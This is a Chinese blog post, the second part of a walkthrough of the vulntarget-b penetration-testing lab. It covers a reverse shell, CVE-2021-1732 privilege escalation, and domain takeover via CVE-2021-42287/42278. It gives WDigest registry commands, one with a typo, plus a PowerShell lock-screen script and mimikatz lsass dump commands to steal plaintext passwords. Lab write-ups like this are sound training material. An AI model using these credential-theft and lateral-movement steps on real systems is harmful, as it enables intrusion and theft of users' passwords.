[永久开源] vulntarget-b_打靶记录(下)

简介: [永久开源] vulntarget-b_打靶记录

link位置是base64编码的地址



然后正常访问到下载的木马文件



获取到之后直接就是root权限。在这里尝试了多次正向失败,关闭本地防火墙然后进行反弹shell:



使用监听:



反弹成功:



查看进程,当前机器使用了火绒:


寻找提权的方式,使用systeminfo命令,将结果复制到网站:


最终使用了CVE_2021_1732_win32k这个提权工具,多执行几次就能成功,我也是看作者这样做的:



查看网卡的配置,当前是存在域环境的,然后也存在第二块网卡,添加路由:



使用命令查找域控制器的IP,由于存在火绒,需要谨慎操作,不然session会断掉:



当前进程中,也是存在域用户的,存在域用户就可以使用域提权漏洞获取域控制器的权限:



使用mimikatzcreds_all命令抓取密码 ,但是没有明文密码。使用这个命令并未拦截:



由于是win10系统,微软在windows 2012 之后就打了补丁kb2871997,需要修改注册表抓取密码。第一条是开启,第二条是关闭:




reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /freg add HKLMS\YSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

修改注册表之后,需要重启或者管理员重新登录才能抓取明文密码,这里可以使用脚本让其锁屏

lock.ps1

Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation


这样就抓取到了明文密码:



对域控IP进行端口扫描,开放的88,445,135端口:



2.3 域提权 CVE-2021-42287/CVE-2021-42278


使用py脚本,填写"域/域用户:域密码",成功获取到域控机器的权限:



使用脚本开启3389,使用rdp协议进行连接:



关闭防火墙:



但是在这里连接失败



原因是由于域控机器开启了如下的功能,需要使用相同的机器才能进行远程访问:



上面的exp脚本也可以直接-dump导出当前的hash,我忘记截图了。然后使用将hash进行md5解密,得知密码:Admin@123

既然知道了密码,在win10机器上进行IPC连接,上传正向的后门到域控制器:


成功获取到域控制器的机器



如下就是所有的sessions


2.4 拓展

还可以使用procdump的方式导出lsass.exe,存放在当前文件的lsass.dmp


接着使用mimikatz进行密码读取


mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

相关文章
|
6月前
|
算法 索引
什么工具可用来建立永久知识库
什么工具可用来建立永久知识库
44 0
|
4月前
|
算法 Java 程序员
技术更新迭代与“八股文”知识库的清理与更新
随着互联网技术的不断更新迭代,曾经被认为是“标准答案”的观点和方法已经逐渐失去适应当前需求的能力,甚至被视为过时的做法。就拿最近的技术圈新闻来讲,在新的JDK版本中,Java编程引入了许多新的特性、工具和方法,使其变得更加简洁、高效和强大,但是之前的旧特性和方法也有许多被废弃了,比如曾经比较经典的偏向锁已经被废弃了,因此,个人觉得是时候对“八股文”进行一次知识库的清理和更新了。那么本文就来分享一下关于偏向锁被废弃以及个人对此的看法,并回顾一下自己的“八股文”知识库,以及技术更新迭代地时候我们要保持及时更新自己的知识储备。
57 2
技术更新迭代与“八股文”知识库的清理与更新
|
9月前
|
存储 缓存 前端开发
【Java项目】bitmap实现B站点赞超过500取消最早的点赞记录的实现思路
【Java项目】bitmap实现B站点赞超过500取消最早的点赞记录的实现思路
119 0
|
11月前
|
安全 Ubuntu 网络协议
【永久开源】vulntarget-c 打靶记录(上)
【永久开源】vulntarget-c 打靶记录
128 0
|
11月前
|
SQL Web App开发 安全
【永久开源】vulntarget-c 打靶记录(下)
【永久开源】vulntarget-c 打靶记录
132 0
|
11月前
|
SQL 安全 Shell
[永久开源] vulntarget-b_打靶记录(上)
[永久开源] vulntarget-b_打靶记录
176 0
|
11月前
|
存储 安全 Shell
vulntarget-i 打靶记录(下)
vulntarget-i 打靶记录
102 0
|
11月前
|
安全 中间件 关系型数据库
vulntarget-i 打靶记录(上)
vulntarget-i 打靶记录
84 0
|
11月前
|
SQL 安全 Shell
vulntarget-h 打靶记录
vulntarget-h 打靶记录
155 0
|
缓存 算法 Java
全网最硬核 JVM TLAB 分析(单篇版不包含额外加菜)(中)
全网最硬核 JVM TLAB 分析(单篇版不包含额外加菜)(中)
全网最硬核 JVM TLAB 分析(单篇版不包含额外加菜)(中)